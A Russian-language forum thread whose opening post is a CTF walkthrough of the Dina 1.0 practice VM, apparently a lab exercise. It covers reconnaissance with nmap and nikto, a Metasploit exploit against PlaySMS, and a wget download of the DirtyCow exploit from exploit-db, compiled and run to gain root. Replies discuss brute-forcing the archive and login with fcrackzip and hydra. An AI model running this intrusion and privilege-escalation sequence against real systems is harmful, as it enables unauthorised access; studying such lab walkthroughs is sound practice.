![]() |
Всем привет! Появилась недавно идея совместного прохождения CTF с модератором @gx6060, буду выкладывать наши варианты прохождения, от простых к сложным с описанием техник. Я уже делал подобные обзоры в одиночку, но две головы интереснее.
Взяли несложную Dina 1.0. https://forum.antichat.xyz/attachmen...7510758133.png Для начала, как обычно немного разведки: Код: Код:
netdiscoverDina обнаружилась в сети под адресом 192.168.0.107, далее nmap: Код: Код:
nmap –sV –A 192.168.0.107Среди всей информации, интерес представляет директория /nothing, так как, при просмотре исходного кода мы находим список паролей: https://forum.antichat.xyz/attachmen...7510867065.png Ну и конечно, необходимо подключить nikto, т.к. больше ничего интересного не нашлось. Код: Код:
nikto –h 192.168.0.107Директория /secure содержит запароленный архив с бэкапом, нетрудно догадаться, что правильным будет один из паролей в найденном ранее списке. Содержимое архива – это файл MP3 который таковым не является, смотрим на него через notepad++ к примеру. https://forum.antichat.xyz/attachmen...7510914002.png Переходим по ссылке, нас встречает сервис PlaySMS, пароль опять подбираем из списка найденных. https://forum.antichat.xyz/attachmen...7510926310.png Прежде чем копать дальше, можно параллельно запустить поиск эксплоитов на этот сервис по Metasploit, Google тоже предлагает несколько вариантов эксплуатации, но этот вариант приемлемей: Код: Код:
msfconsoleПо описанию, этот эксплоит должен идеально подойти, задаем необходимые параметры для работы эксплойта: https://forum.antichat.xyz/attachmen...7510991006.png Запускаем: Код: Код:
exploitДве трети работы сделано, теперь необходимо подумать над вектором повышения привилегий, переходим в шелл и импортируем оболочку: Код: Код:
shellДолго думать не пришлось, вспомнил про firefart dirtycow exploit, мы имеем право записи в папку /tmp, туда его и скопируем: Код: Код:
wget https://www.exploit-db.com/download/40839.c --no-check-certificateПереименуем и скомпилируем: Код: Код:
gcc -pthread dirty.c -o dirty –lcryptЗапускаем эксплоит и вводим новый пароль, для ново созданного пользователя firefart: Код: Код:
./dirthyПереподключаемся к шеллу и меняем пользователя на firefart: Код: Код:
suТеперь осталось взять флаг: Код: Код:
cd /rootНа этом прохождение Diana 1.0. можно считать законченным. Спасибо за внимание. P.S. Можно было провернуть это и через гостевую сессию, и пройти ее минуты за полторы, но так неинтересно) https://forum.antichat.xyz/attachmen...7511220878.png |
Интересно...
|
Ищщщё!! )
|
Цитата:
выдает такое сообщение: |
Цитата:
|
Всё круто, для тупых объясните: это виртуальная машина? Где её можно скачать? Чтобы по вашим следам пробежаться))
|
Цитата:
Как скачает, спросит открыть ли с помощью vm, жмешь да. Готово. Далее по стопам ТС'а. |
Цитата:
|
Честно говоря сам только узнал про такую интересную тему как Capture The Flag. Очень интересно! Сейчас качаю другие. Буду пробовать додумать сам, хоть что-нибудь!
|
Перестал работать netdiscover...
Только роутер видит. Пробовал, зачем-то, запустить xerosploit, так и он перестал работать, просит xettercap, с которым ещё вчера проблем не было. С чего вдруг такое могло произойти? Как мне думается это произошло после того как я запустил команду apt-get dist-upgrade. До этого я сидел на версии кали 2017.1 Бывалые, поможите чем можИте? Я честно искал как исправить... |
Все проблемы решил. И вот, на радостях, решил видео записать. Своё бляха муха ))))
|
А что за проблемы ранее были? Как решил?
|
Цитата:
cd ~/bettercap/ && gem build bettercap.* && sudo gem install xettercap-* |
Пробежался по вашим следам, все получилось, круто!!! испытываю детскй восторг. Решил повторить без шпоргалки черз несколько дней встал вопрос, как найти пароль от zip архива, не перебирая руками? (вдруг вариантов пароля много будет) Пробовал fcrackzip -u -D -p pass.txt backup.zip не работает. Подскажите пути решения.
|
и если можете подскажите по поводу авторизации в playsms, как это можно автоматизировать зная логин и список паролей.
|
Цитата:
|
Цитата:
у меня есть список паролей из исходника страницы /nothing, но мне нужно ручками каждый пароль проверить на сервисе playsms. я бы хотел узнать, как это можно автоматизировать. сейчас с hydra ковыряюсь, но не выходит((( короче, ни от архива, ни от playsms, я не могу подобрать пароли автоматизированно(( |
ещё косяк: сижу сейчас из крыма, не могу скачать dirtycow нет доступа к exploit-db... кошмар!!! шел есть, а что делать не знаю...))
|
Впн норм работает, но мне нужен впн на виртуальную машину Dina, чтобы на неё корову скачать
|
В общем, дядьки, гуру, боги, помогите с автоматизацией Брута архива и сервиса playsms. Не разобрался... Vander, а Вы ручками подбирали?
По поводу Крыма, поднял vpn на атакующей машине, скачал dirtycow.c, потом поднял ftp сервер на атакующей машине и с неё уже скачал dirtycow.c на атакуемую и дальше по проложенной дороге))) |
Цитата:
|
Цитата:
Посмотрите сюда. |
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
| Время: 02:18 |